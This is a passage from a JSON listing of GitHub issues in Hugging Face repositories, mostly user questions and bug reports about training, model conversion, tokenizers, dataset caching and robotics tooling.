    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-12T05:03:27Z",
    "updated_at": "2025-10-17T12:06:45Z",
    "user": "ZhangWuWei"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 881,
    "title": "Accelerators: Error fetching data. how to troubleshoot",
    "body": "\nGetting this error message when trying to train my model using Autotrain\n\n\nAccelerators: Error fetching data\nError fetching training status\n\n\nMy data file is a csv & correctly formatted. \nWhat are possible ways to troubleshoot this problem?\nI'm new to fine-tuning so would love any assistance ",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/881",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-11T16:04:12Z",
    "updated_at": "2025-06-02T15:02:09Z",
    "user": "innerspacestudio"
  },
  {
    "repo": "huggingface/alignment-handbook",
    "number": 215,
    "title": "Use alignment-handbook on Apple Silicon",
    "body": "Hi, is it possible to install and use this tool on Apple Silicon? I am aware that certain dependencies, such as Flash Attention, do not work on Apple Silicon. Has anyone tried and successfully installed this tool without those dependencies?",
    "url": "https://github.com/huggingface/alignment-handbook/issues/215",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-11T01:28:02Z",
    "updated_at": "2025-04-27T01:09:55Z",
    "comments": 0,
    "user": "minhquoc0712"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 968,
    "title": "\u6ca1\u6709\u7269\u7406\u673a\u5668\u4eba\u6211\u5982\u4f55\u8fdb\u884c\u4eff\u771f\u673a\u5668\u4eba\uff0c\u6211\u5e94\u8be5\u5982\u4f55\u5b66\u4e60",
    "body": "\u6ca1\u6709\u7269\u7406\u673a\u5668\u4eba\u6211\u5982\u4f55\u8fdb\u884c\u4eff\u771f\u673a\u5668\u4eba\uff0c\u6211\u5e94\u8be5\u5982\u4f55\u5b66\u4e60\u4eff\u771f\u673a\u5668\u4eba\u5462\uff0c\u6709\u6ca1\u6709\u597d\u7684\u63a8\u8350\u5417",
    "url": "https://github.com/huggingface/lerobot/issues/968",
    "state": "closed",
    "labels": [
      "question",
      "simulation"
    ],
    "created_at": "2025-04-10T18:10:47Z",
    "updated_at": "2025-10-08T12:54:19Z",
    "user": "harryhu0301"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11285,
    "title": "value errors in convert to/from diffusers from original stable diffusion",
    "body": "### Describe the bug\n\nThere's a hardcode somewhere for 77 tokens, when it should be using the dimensions of what is actually in the model.\n\nI have a diffusers-layout SD1.5 model, with LongCLIP.\n\nhttps://huggingface.co/opendiffusionai/xllsd-alpha0\n\nI can pull it locally, then convert to single file format, with\n\npython convert_diffusers_to_original_stable_diffusion.py \\\n  --use_safetensors \\\n  --model_path $SRCM \\\n  --checkpoint_path $DESTM\n\nBut then if I try to convert it back, I get size errors for the text encoder not being 77 size.\n\n\nI should point out that the model WORKS PROPERLY for diffusion, when loaded in diffusers format, so I dont have some funky broken model here.\n\n\n\n### Reproduction\n\nfrom transformers import CLIPTextModel, CLIPTokenizer\n\nfrom diffusers import StableDiffusionPipeline, AutoencoderKL\nimport torch\n\n\npipe = StableDiffusionPipeline.from_single_file(\n        \"XLLsd-phase0.safetensors\",\n        torch_dtype=torch.float32,\n        use_safetensors=True)\n\n\noutname = \"XLLsd_recreate\"\npipe.save_pretrained(outname, safe_serialization=False)\n\n### Logs\n\n```shell\nvenv/lib/python3.12/site-packages/diffusers/models/model_loading_utils.py\", line 230, in load_model_dict_into_meta\n    raise ValueError(\nValueError: Cannot load  because text_model.embeddings.position_embedding.weight expected shape torch.Size([77, 768]), but got torch.Size([248, 768]). If you want to instead overwrite randomly initialized weights, please make sure to pass both `low_cpu_mem_usage=False` and `ignore_mismatched_sizes=True`. For more information, see also: https://github.com/huggingface/diffusers/issues/1619#issuecomment-1345604389 as an example.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.2\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.12.3\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.29.3\n- Transformers version: 4.50.0\n- Accelerate version: 1.5.2\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11285",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-10T17:16:42Z",
    "updated_at": "2025-05-12T15:03:03Z",
    "comments": 2,
    "user": "ppbrown"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11272,
    "title": "what is the difference between from diffusion import *** and from diffusers import ***?",
    "body": "I have installed diffusers and it runs ok, however the code gets wrong with \" no module named diffusion \"\nwhen goes to from diffusion import ***?\nWhat is the difference between from diffusion import *** and from diffusers import ***?\nNeed I install them all and what is the difference between diffusion and diffusers?",
    "url": "https://github.com/huggingface/diffusers/issues/11272",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T05:11:56Z",
    "updated_at": "2025-04-30T02:11:51Z",
    "user": "micklexqg"
  },
  {
    "repo": "huggingface/inference-benchmarker",
    "number": 11,
    "title": "How to set the OPENAI_API_KEY?",
    "body": "There is no api_key param for inference-benchmarker. How to set the OPENAI_API_KEY?\nThanks~\n\ncode there:\nhttps://github.com/huggingface/inference-benchmarker/blob/d91a0162bdfe318fe95b9a9bbb53b1bdc39194a9/src/requests.rs#L145C1-L153C36\n\n```bash\nroot@P8757303A244:/opt/inference-benchmarker# inference-benchmarker -h\nUsage: inference-benchmarker [OPTIONS] --tokenizer-name \n\nOptions:\n  -t, --tokenizer-name \n          The name of the tokenizer to use [env: TOKENIZER_NAME=]\n      --model-name \n          The name of the model to use. If not provided, the same name as the tokenizer will be used [env: MODEL_NAME=]\n  -m, --max-vus \n          The maximum number of virtual users to use [env: MAX_VUS=] [default: 128]\n  -d, --duration \n          The duration of each benchmark step [env: DURATION=] [default: 120s]\n  -r, --rates \n          A list of rates of requests to send per second (only valid for the ConstantArrivalRate benchmark) [env: RATES=]\n      --num-rates \n          The number of rates to sweep through (only valid for the \"sweep\" benchmark) The rates will be linearly spaced up to the detected maximum rate [env: NUM_RATES=] [default: 10]\n      --profile \n          A benchmark profile to use [env: PROFILE=]\n  -b, --benchmark-kind \n          The kind of benchmark to run (throughput, sweep, optimum) [env: BENCHMARK_KIND=] [default: sweep]\n  -w, --warmup \n          The duration of the prewarm step ran before the benchmark to warm up the backend (JIT, caches, etc.) [env: WARMUP=] [default: 30s]\n  -u, --url \n          The URL of the backend to benchmark. Must be compatible with OpenAI Message API [env: URL=] [default: http://localhost:8000]\n  -n, --no-console\n          Disable console UI [env: NO_CONSOLE=]\n      --prompt-options \n          Constraints for prompt length. No value means use the input prompt as defined in input dataset. We sample the number of tokens to generate from a normal distribution. Specified as a comma-separated list of key=value pairs. * num_tokens: target number of prompt tokens * min_tokens: minimum number of prompt tokens * max_tokens: maximum number of prompt tokens * variance: variance in the number of prompt tokens [env: PROMPT_OPTIONS=]\n      --decode-options \n          Constraints for the generated text. We sample the number of tokens to generate from a normal distribution. Specified as a comma-separated list of key=value pairs. * num_tokens: target number of generated tokens * min_tokens: minimum number of generated tokens * max_tokens: maximum number of generated tokens * variance: variance in the number of generated tokens [env: DECODE_OPTIONS=]\n      --dataset \n          Hugging Face dataset to use for prompt generation [env: DATASET=] [default: hlarcher/inference-benchmarker]\n      --dataset-file \n          File to use in the Dataset [env: DATASET_FILE=] [default: share_gpt_filtered_small.json]\n      --extra-meta \n          Extra metadata to include in the benchmark results file, comma-separated key-value pairs. It can be, for example, used to include information about the configuration of the benched server. Example: --extra-meta \"key1=value1,key2=value2\" [env: EXTRA_META=]\n      --run-id \n          [env: RUN_ID=]\n  -h, --help\n          Print help (see more with '--help')\n  -V, --version\n          Print version\n```",
    "url": "https://github.com/huggingface/inference-benchmarker/issues/11",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T04:36:11Z",
    "updated_at": "2025-04-25T13:13:18Z",
    "user": "handsome-chips"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37408,
    "title": "How to solve the error of converting Qwen onnx_model to tensorRT_model?",
    "body": "### **1. The transformers' Qwen ONNX model has been exported successfully.**\n\n### **2. Convert ONNX_model to tensorRT_model failed by trtexec.**\n\n**error info**\n\n```\n[04/10/2025-11:04:52] [E] Error[3]: IExecutionContext::setInputShape: Error Code 3: API Usage Error (Parameter check failed, condition: engineDims.d[i] == dims.d[i]. Static dimension mismatch while setting input shape for key_cache.1. Set dimensions are [7,8,32,128]. Expected dimensions are [7,8,1,128].)\n[04/10/2025-11:04:52] [E] The engine was built with static shapes for input tensor key_cache.1 but the provided shapes do not match the static shapes!\n[04/10/2025-11:04:52] [E] Inference set up failed\n```\n\n### **Due to the fact that Qwen of Transoformers utilizes the DynamicCache class to handle KVcache, The error should be attributed to DynamicCache.**\n\n**### ONNX model check OK**\n\n```\nThe model is well-formed and valid!\n=======================Model1 inputs:\nx_s [1, 'seq_len', 1024]\nattn_mask [1, 'seq_len', 'seq_len']\nkey_cache.1 [7, 8, 'seq_len', 128]\nvalue_cache.1 [7, 8, 'seq_len', 128]\n=======================Model1 outputs:\ny_pred [1, 'seq_len', 1024]\nkey_cache [7, 8, 'seq_len', 128]\nvalue_cache [7, 8, 'seq_len', 128]\n```\n\n**export foward**\n\n```\ndef injected_forward(\n    self, \n    xs: torch.Tensor,\n    att_mask: torch.Tensor = torch.ones((0, 0, 0), dtype=torch.bool),\n    key_cache: torch.Tensor = torch.zeros((0, 0, 0, 0), dtype=torch.float32),\n    value_cache: torch.Tensor = torch.zeros((0, 0, 0, 0), dtype=torch.float32)\n) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n    att_mask = ~att_mask.unsqueeze(1) * torch.finfo(xs.dtype).min\n    past_key_values = DynamicCache(self.config.num_hidden_layers)\n\n    for i in torch.arange(self.config.num_hidden_layers):\n        past_key_values.key_cache[i] = key_cache[i].unsqueeze(0)\n        past_key_values.value_cache[i] = value_cache[i].unsqueeze(0)\n    \n    past_seen_tokens =  past_key_values.get_seq_length()\n    cache_position = torch.arange(past_seen_tokens, past_seen_tokens + xs.shape[1], device=xs.device)\n    position_ids = cache_position.unsqueeze(0)\n\n    hidden_states = xs\n    for decoder_layer in self.layers[: self.config.num_hidden_layers]:\n        layer_outputs = decoder_layer(\n            hidden_states,\n            attention_mask=att_mask,\n            position_ids=position_ids,\n            past_key_value=past_key_values,\n            output_attentions=False,\n            use_cache=True,\n            cache_position=cache_position,\n        )\n\n        hidden_states = layer_outputs[0]\n\n    xs = self.norm(hidden_states)\n    new_key_cache = torch.cat(past_key_values.key_cache, dim=0)\n    new_value_cache = torch.cat(past_key_values.value_cache, dim=0)\n\n    return xs, new_key_cache, new_value_cache\n\n```\n\n\n\n\n\n",
    "url": "https://github.com/huggingface/transformers/issues/37408",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T04:08:47Z",
    "updated_at": "2025-06-28T08:03:06Z",
    "user": "dearwind153"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 964,
    "title": "RuntimeError: Could not load libtorchcodec during lerobot/scripts/train.py script",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-6.8.0-57-generic-x86_64-with-glibc2.35\n- Python version: 3.10.13\n- Huggingface_hub version: 0.29.3\n- Dataset version: 3.4.1\n- Numpy version: 1.26.4\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Cuda version: 12040\n\n\nAdditionally: \n\nffmpeg version : 7.1.1\nTorchCodec version : 0.2.1\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nInstall leRobot from the main documentation as follows : \n\nconda create -n lerobot python=3.10 -y\nconda activate lerobot\ngit clone https://github.com/huggingface/lerobot.git ~/lerobot\npip install --no-binary=av -e\npip install torchvision==0.20.1\nconda install -c conda-forge 'ffmpeg>=7.0' -y\n\n\nAfter collecting a dataset, run `lerobot/scripts/train.py` script \n\n### Expected behavior\n\nHello all! \n\nI am getting started with the lerobot so100 arm and have had a few issues. \n\nThe first was the same as the issue in #883 in running the `control_robot.py` script which I solved (or bypassed) by following [remi cadene's response](https://github.com/huggingface/lerobot/issues/679#issuecomment-2737292192 ) to do `pip install torchvision==0.20.1` and also `conda install -c conda-forge 'ffmpeg>=7.0' -y` after doing `pip install --no-binary=av -e `. This allowed me to successfully run the `control_robot.py` script successfully. However, then I tried to collect a dataset and run a training with the `lerobot/scripts/train.py` script and I encountered the following issue : \n\n```\nfrom torchcodec.decoders._core.video_decoder_ops import (\n  File \"/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/decoders/_core/video_decoder_ops.py\", line 59, in \n    load_torchcodec_extension()\n  File \"/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/decoders/_core/video_decoder_ops.py\", line 44, in load_torchcodec_extension\n    raise RuntimeError(\nRuntimeError: Could not load libtorchcodec. Likely causes:\n          1. FFmpeg is not properly installed in your environment. We support\n             versions 4, 5, 6 and 7.\n          2. The PyTorch version (2.5.1+cu124) is not compatible with\n             this version of TorchCodec. Refer to the version compatibility\n             table:\n             https://github.com/pytorch/torchcodec?tab=readme-ov-file#installing-torchcodec.\n          3. Another runtime dependency; see exceptions below.\n        The following exceptions were raised as we tried to load libtorchcodec:\n        \n[start of libtorchcodec loading traceback]\n/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/libtorchcodec7.so: undefined symbol: _ZNK3c1011StorageImpl27throw_data_ptr_access_errorEv\nlibavutil.so.58: cannot open shared object file: No such file or directory\nlibavutil.so.57: cannot open shared object file: No such file or directory\n/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/libtorchcodec4.so: undefined symbol: _ZNK3c1011StorageImpl27throw_data_ptr_access_errorEv\n[end of libtorchcodec loading traceback].\n\n```\n\nIt seems that I have some issues with the `torchcodec`and `ffmpeg` versions not being compatible. Checking their versions gives me: \n\n```\nffmpeg version 7.1.1 Copyright (c) 2000-2025 the FFmpeg developers\nbuilt with gcc 13.3.0 (conda-forge gcc 13.3.0-2)\nconfiguration: --prefix=/home/moonshot/miniconda3/envs/lerobot --cc=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-cc --cxx=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-c++ --nm=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-nm --ar=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-ar --disable-doc --enable-openssl --enable-demuxer=dash --enable-hardcoded-tables --enable-libfreetype --enable-libharfbuzz --enable-libfontconfig --enable-libopenh264 --enable-libdav1d --disable-gnutls --enable-libmp3lame --enable-libvpx --enable-libass --enable-pthreads --enable-alsa --enable-libpulse --enable-vaapi --enable-libopenvino --enable-gpl --enable-libx264 --enable-libx265 --enable-libaom --enable-libsvtav1 --enable-libxml2 --enable-pic --enable-shared --disable-static --enable-version3 --enable-zlib --enable-libvorbis --enable-libopus --enable-librsvg --enable-ffplay --pkg-config=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/pkg-config\nlibavutil      59. 39.100 / 59. 39.100\nlibavcodec     61. 19.101 / 61. 19.101\nlibavformat    61.  7.100 / 61.  7.100\nlibavdevice    61.  3.100 / 61.  3.100\nlibavfilter    10.  4.100 / 10.  4.100\nlibswscale      8.  3.100 /  8.  3.100\nlibswresample   5.  3.100 /  5.  3.100\nlibpostproc    58.  3.100 / 58.  3.100\n\n```\n\nAnd `TorchCodec` version  0.2.1. \n\nCould anyone suggest the right v",
    "url": "https://github.com/huggingface/lerobot/issues/964",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-09T14:25:38Z",
    "updated_at": "2025-04-15T13:32:24Z",
    "user": "shrutichakraborty"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37390,
    "title": "how to reduce original model's tokenizer vocabulary",
    "body": "`###` Feature request\n\nI am working on model distillation. I am currently using the nllb-distilled-600M model, but the parameters of this model are still too large, and the vocabulary supports more than 100 languages. My use case is single language translation, such as English to Hebrew. Therefore, I need to reduce the redundant vocabulary of the original model and only keep the English and Hebrew vocabulary. I noticed that transformers do not use the sentencepiece.bpe.model file, and I don't want to retrain a tokenizer, because the trained tokenizer will be inconsistent with the original tokenizer result, which will lead to the subsequent model weight migration and model distillation process cannot be carried out. Therefore, my idea is to quickly replace the tokenizer.json and tokenizer_config.json files in the original model, and then migrate the model weights at the model level to get a pruned model. What I am doing now is to load the original model tokenizer, tokenize the corpus I prepared, count the registered tokens, regain a reduced vocabulary, and change the corresponding json file. Is there any better strategy to quickly replace the tokenizer vocabulary?\n\n![Image](https://github.com/user-attachments/assets/0433f4df-766d-4804-a752-e02a104d3cfa)\n\n### Motivation\n\nquick modify model vocabulary for beater application\n\n### Your contribution\n\n> `def modify_tokenizer():\n\n    for sentences in tqdm.tqdm(range(100,len(en_corpus),100)):\n        enc = teacher_tokenizer(en_corpus[sentences-100:sentences],\n                        add_special_tokens=False,\n                        return_attention_mask=False,\n                        return_token_type_ids=False)\n        for ids in enc['input_ids']:\n            selected_ids.update(ids)\n    print('all english tokens nums is ',len(selected_ids))\n    for sentences in tqdm.tqdm(range(100,len(he_corpus),100)):\n        enc = teacher_tokenizer(he_corpus[sentences-100:sentences],\n                        add_special_tokens=False,\n                        return_attention_mask=False,\n                        return_token_type_ids=False)\n        for ids in enc['input_ids']:\n            selected_ids.update(ids)\n    print('all english+Hebrew tokens nums is ',len(selected_ids))\n    for tok in teacher_tokenizer.all_special_tokens:\n        # print('special_token ',tok)\n        selected_ids.add(teacher_tokenizer.convert_tokens_to_ids(tok))\n    print('all english+Hebrew_special tokens nums is ',len(selected_ids))\n    #  \u4ece\u539f vocab \u4e2d\u53cd\u67e5\u51fa\u5bf9\u5e94 token\n    orig_vocab = teacher_tokenizer.get_vocab()\n    new_tokens = []\n    for tok, idx in sorted(orig_vocab.items(), key=lambda kv: kv[1]):\n        if idx in selected_ids:\n            new_tokens.append(tok)\n    # \u5199\u51fa\u65b0\u7684 vocab.json\uff08Hugging Face \u683c\u5f0f\uff09\n    new_vocab = {tok: i for i, tok in enumerate(new_tokens)}\n    #\u4fee\u6539\u539f\u6709tokenizer\u548ctokenizer_config\n    teacher_tokenizer_path='/workspace/nllb-200-distilled-600M/tokenizer.json'\n    teacher_tokenizer_config_path='/workspace/nllb-200-distilled-600M/tokenizer_config.json'\n    student_tokenizer_path='/workspace/distilled_model_test/tokenizer.json'\n    student_tokenizer_config_path='/workspace/distilled_model_test/tokenizer_config.json'\n    def _read_json(path):\n        with open(path, \"r\", encoding=\"utf-8\") as f:\n            data = json.load(f)\n        return data\n    def _write_json(path,data):\n        with open(path, \"w\", encoding=\"utf-8\") as f:\n            json.dump(data, f, ensure_ascii=False, indent=2)\n    #change tokenizer \n    student_tokenizer_data=_read_json(teacher_tokenizer_path)\n    student_tokenizer_data['model']['vocab']=new_vocab\n    for single_added_token in student_tokenizer_data['added_tokens']:\n        single_added_token['id']=new_vocab[single_added_token['content']]\n    new_merges=[]\n    #change merges\n    for merge_pair in student_tokenizer_data['model']['merges']:\n        _temp_merge=merge_pair[0]+merge_pair[1]\n        if _temp_merge in new_vocab.keys():\n            new_merges.append(merge_pair)\n    student_tokenizer_data['model']['merges']=new_merges\n    _write_json(student_tokenizer_path,student_tokenizer_data)\n    #change tokenizer_config`",
    "url": "https://github.com/huggingface/transformers/issues/37390",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-09T10:45:56Z",
    "updated_at": "2025-04-09T10:53:07Z",
    "user": "masterwang22327"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7506,
    "title": "HfHubHTTPError: 429 Client Error: Too Many Requests for URL when trying to access Fineweb-10BT on 4A100 GPUs using SLURM",
    "body": "### Describe the bug\n\nI am trying to run some finetunings on 4 A100 GPUs using SLURM using axolotl training framework which in turn uses Huggingface's Trainer and Accelerate on [Fineweb-10BT](https://huggingface.co/datasets/HuggingFaceFW/fineweb), but I end up running into 429 Client Error: Too Many Requests for URL error when I call next(dataloader_iter). Funny is, that I can run some test fine tuning (for just 200 training steps) in 1 A100 GPU using SLURM. Is there any rate limiter set for querying dataset? I could run the fine tuning with the same settings (4 A100 GPUs in SLURM) last month.\n\n### Steps to reproduce the bug\n\nYou would need a server installed with SLURM\n\n1. Create conda environment\n1.1 conda create -n example_env -c conda-forge gxx=11 python=3.10\n1.2 conda activate example_env\n1.3 pip install torch==2.5.1 torchvision==0.20.1 torchaudio==2.5.1 --index-url https://download.pytorch.org/whl/cu124\n1.4 conda install nvidia/label/cuda-12.4.0::cuda-toolkit\n1.5 Download flash_attn-2.7.4.post1+cu12torch2.5cxx11abiFALSE-cp310-cp310-linux_x86_64.whl\n1.6 pip3 install packaging\n1.7 pip3 install ninja\n1.8 pip3 install mlflow\n1.9 Clone https://github.com/calvintanama/axolotl.git\n1.10 `cd` to `axolotl`\n1.11 pip3 install -e '.[deepspeed]'\n\n2. Run the training\n2.1. Create a folder called `config_run` in axolotl directory\n2.2. Copy `config/phi3_pruned_extra_pretrain_22_29_bottleneck_residual_8_a100_4.yaml` to `config_run`\n2.3. Change yaml file in the `config_run` accordingly\n2.4. Change directory and conda environment name in `jobs/train_phi3_22_29_bottleneck_residual_8_a100_4_temp.sh`\n2.5. `jobs/train_phi3_22_29_bottleneck_residual_8_a100_4_temp.sh`\n\n### Expected behavior\n\nThis should not cause any error, but gotten\n\n```\nFile \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/accelerate/data_loader.py\", line 552, in __iter__\n[rank3]:     current_batch = next(dataloader_iter)\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 701, in __next__\n[rank3]:     data = self._next_data()\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 757, in _next_data\n[rank3]:     data = self._dataset_fetcher.fetch(index)  # may raise StopIteration\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 33, in fetch\n[rank3]:     data.append(next(self.dataset_iter))\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/accelerate/data_loader.py\", line 338, in __iter__\n[rank3]:     for element in self.dataset:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 2266, in __iter__\n[rank3]:     for key, example in ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1866, in __iter__\n[rank3]:     for key, example in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1084, in __iter__\n[rank3]:     yield from self._iter()\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1263, in _iter\n[rank3]:     for key, transformed_example in outputs:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1258, in \n[rank3]:     outputs = (\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1244, in iter_outputs\n[rank3]:     for i, key_example in inputs_iterator:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1106, in iter_batched_inputs\n[rank3]:     for key, example in iterator:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1866, in __iter__\n[rank3]:     for key, example in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1535, in __iter__\n[rank3]:     for x in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datase",
    "url": "https://github.com/huggingface/datasets/issues/7506",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-09T06:32:04Z",
    "updated_at": "2025-06-29T06:04:59Z",
    "comments": 2,
    "user": "calvintanama"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 960,
    "title": "pi0-fintune-performance",
    "body": "I have been fine-tuning the provided pi0-base model on my dataset using LeRobot. After training for 100,000 steps, I found that the model performs well on tasks that appeared in my dataset, but its performance on unseen tasks is very poor. It seems to lack the generalization ability of a VLA model. Is this phenomenon normal? Are there any strategies to improve this situation?",
    "url": "https://github.com/huggingface/lerobot/issues/960",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-04-09T01:21:12Z",
    "updated_at": "2025-10-08T08:43:22Z",
    "user": "yanghb1"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 956,
    "title": "pi0 multi gps train",
    "body": "if i have multi 4090, how to modify to train pi0?\n\nonly 1 4090 just error\n![Image](https://github.com/user-attachments/assets/5f1900f2-6d0a-4e05-be99-81587f0bb22d)",
    "url": "https://github.com/huggingface/lerobot/issues/956",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-08T13:06:27Z",
    "updated_at": "2025-11-20T03:07:56Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37364,
    "title": "How to find a specific func doc when using transformers doc?",
    "body": "### Feature request\n\nBetter UX for doc\n\n### Motivation\n\nThe search and UI layout make it so hard to find a func doc, especially when there are so many func doc in one webpage and your just can not find what you want by web page search.\n\n### Your contribution\n\nno, right now",
    "url": "https://github.com/huggingface/transformers/issues/37364",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-08T10:48:04Z",
    "updated_at": "2025-09-15T19:16:35Z",
    "user": "habaohaba"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 586,
    "title": "what is next for this project?",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/586",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-07T21:29:54Z",
    "updated_at": "2025-04-07T21:29:54Z",
    "user": "Mnaik2"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 949,
    "title": "Optional deps in using LeRobot as am optional package",
    "body": "Hi, we are working on enabling LeRobot dataset generation in [IsaacLab](https://github.com/isaac-sim/IsaacLab), such that developers could create data with IsaacLab data generation workflow and use it in their robot learning models.  \n\nThe asks are, \n1. Is there any scheduled release, such that downstream devs could have stable codebase to integrate LeRobot into their applications?\n2. Can we move some deps as optional wrt the core code, if training/eval is not expected? For example, we only need Lerobot dataset related functions, Gymnasium dependency is not needed. You only need Gymnasium dependency if you want to use the environment in eval mode during training or deployment.\n\nI hope those could expand the user base further for LeRobot dataset generation and for training/eval with broader model families.",
    "url": "https://github.com/huggingface/lerobot/issues/949",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "simulation",
      "stale"
    ],
    "created_at": "2025-04-07T16:55:48Z",
    "updated_at": "2025-10-21T02:29:27Z",
    "user": "xyao-nv"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7502,
    "title": "`load_dataset` of size 40GB creates a cache of >720GB",
    "body": "Hi there,\n\nI am trying to load a dataset from the Hugging Face Hub and split it into train and validation splits. Somehow, when I try to do it with `load_dataset`, it exhausts my disk quota. So, I tried manually downloading the parquet files from the hub and loading them as follows:\n\n```python\n ds = DatasetDict(\n        {\n            \"train\": load_dataset(\n                \"parquet\", \n                data_dir=f\"{local_dir}/{tok}\", \n                cache_dir=cache_dir, \n                num_proc=min(12, os.cpu_count()),   # type: ignore\n                split=ReadInstruction(\"train\", from_=0, to=NUM_TRAIN, unit=\"abs\"),  # type: ignore\n            ),\n            \"validation\": load_dataset(\n                \"parquet\", \n                data_dir=f\"{local_dir}/{tok}\", \n                cache_dir=cache_dir, \n                num_proc=min(12, os.cpu_count()),   # type: ignore\n                split=ReadInstruction(\"train\", from_=NUM_TRAIN, unit=\"abs\"),  # type: ignore\n            )\n        }\n    )\n\n```\n\nwhich still strangely creates 720GB of cache. In addition, if I remove the raw parquet file folder (`f\"{local_dir}/{tok}\"` in this example), I am not able to load anything. So, I am left wondering what this cache is doing. Am I missing something? Is there a solution to this problem?\n\nThanks a lot in advance for your help!\n\nA related issue: https://github.com/huggingface/transformers/issues/10204#issue-809007443.\n\n---\n\nPython: 3.11.11\ndatasets: 3.5.0\n",
